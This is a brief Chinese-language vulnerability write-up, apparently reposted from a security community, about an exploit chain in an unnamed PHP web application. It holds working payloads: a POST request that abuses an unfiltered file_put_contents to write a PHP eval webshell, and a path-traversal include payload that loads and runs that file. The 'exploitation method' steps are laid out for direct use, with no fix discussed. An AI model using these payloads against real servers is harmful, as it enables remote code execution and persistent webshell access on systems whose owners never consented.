作者:Dodgers
自动化审计,在这个/auth_pi/authService.php文件下发现file_put_contents函数可控,跟进该文件。
/auth_pi/authService.php文件的set_authAction方法。在76行的提醒语句也说明了该info文件在user_auth目录下,而且也未对userName进行安全过滤,这里可以任意路径创建文件。
而P方法存在于/mvc/lib/core.function.php的类里面,是用来接收POST传参。
这里注意:包含路径是data下的
利用方式:
1:post请求
2:请求参数a=set_auth
3:参数为userName、auth
payload:
userName=tr1&auth=?php%20@eval($_POST['w']);?
自动化审计,在这个/local/auth/php/getCfile.php文件下发现include 函数可控,跟进该文件。
这个文件通过post方式传参但是并没有对cf参数进行安全过滤
利用方式:
1:post请求
2:必须存在tmp/app_auth/cfile目录或者自己创建
3:参数为cf、&field=1
payload:
cf=../../../data/tr.info&field=1&w=phpinfo();
说明:这里的文件需要刚刚写文件的文件名
该文章来源火线Zone社区:https://zone.huoxian.cn/d/433-0day-2
本文作者:火线安全平台
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/165255.html